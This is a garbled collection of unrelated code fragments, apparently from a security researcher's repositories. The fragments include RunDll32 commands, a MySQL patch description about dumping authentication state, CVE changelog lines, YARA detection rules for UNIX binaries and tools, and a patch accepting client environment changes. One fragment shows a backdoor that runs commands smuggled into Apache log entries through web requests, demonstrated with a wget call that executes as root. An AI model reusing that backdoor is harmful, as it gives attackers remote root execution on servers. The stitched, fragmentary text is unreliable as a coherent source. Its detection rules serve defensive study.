- RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0
- RunDll32.exe msrating.dll,RatingSetupUI
| Description: Dump the authentication state to understand the hashing algorithms | |
| Dump the authentication state to understand the hashing algorithms. | |
| Specifically, caching_sha2_password and mysql_native_password. | |
| . | |
| mysql-8.0 (8.0.23-0ubuntu0.20.04.1) focal-security; urgency=medium | |
| . | |
| * SECURITY UPDATE: Update to 8.0.23 to fix security issues | |
| - CVE-2021-2002, CVE-2021-2010, CVE-2021-2011, CVE-2021-2021, | |
| CVE-2021-2022, CVE-2021-2024, CVE-2021-2031, CVE-2021-2032, | |
| CVE-2021-2036, CVE-2021-2038, CVE-2021-2046, CVE-2021-2048, |
| $ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash | |
| $ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~' | |
| root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash | |
| root 11125 10680 17 21:27 pts/1 00:00:02 bash | |
| $ ls /proc/11125/fd | |
| total 0 | |
| dr-x------ 2 root root 0 Jun 28 21:27 . |
| aix 10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba.xcoff | |
| aix 3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c.xcoff | |
| aix ca9ab48d293cc84092e8db8f0ca99cb155b30c61d32a1da7cd3687de454fe86c.xcoff | |
| aix d465637518024262c063f4a82d799a4e40ff3381014972f24ea18bc23c3b27ee.xcoff | |
| enterpriseunix2 10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba.xcoff | |
| enterpriseunix2 3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c.xcoff | |
| enterpriseunix2 ca9ab48d293cc84092e8db8f0ca99cb155b30c61d32a1da7cd3687de454fe86c.xcoff | |
| enterpriseunix2 d465637518024262c063f4a82d799a4e40ff3381014972f24ea18bc23c3b27ee.xcoff |
| import "elf" | |
| rule enterpriseapps2 { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Enterprise apps" | |
| strings: | |
| $db2 = "db2" nocase | |
| $oracle = "oracle" nocase | |
| $mysql = "mysql" nocase |
| import "elf" | |
| rule enterpriseunix2 { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Enterprise UNIX" | |
| strings: | |
| $aix = "aix" nocase | |
| $solaris = "solaris" nocase | |
| $hpux = "hpux" nocase |
| rule adonunix2 { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "AD on UNIX" | |
| strings: | |
| $quest = "/quest" | |
| $sss = "/sss" | |
| $pbis = "/pbis" | |
| $ipa = "/ipa" | |
| $samba = "/samba" |
| rule ciscotools { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Cisco tools" | |
| strings: | |
| $labs = "labs.portcullis.co.uk" | |
| $portcullislabs = "portcullislabs" | |
| $CiscoCXSecurity = "CiscoCXSecurity" | |
| $timb_machine = "timb_machine" | |
| $pentestmonkey = "pentestmonkey" |
| Description: Accept environment changes. | |
| Accept environment changes during negotiation by the client. | |
| Author: Tim Brown <github@timb.me.uk> | |
| --- | |
| The information above should follow the Patch Tagging Guidelines, please | |
| checkout http://dep.debian.net/deps/dep3/ to learn about the format. Here | |
| are templates for supplementary fields that you might want to add: | |
| Origin: <vendor|upstream|other>, <url of original patch> |
| rule aix { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "AIX binary" | |
| strings: | |
| $libca = "libc.a" | |
| $text = ".text" | |
| $data = ".data" | |
| condition: | |
| $libca and $text and $data |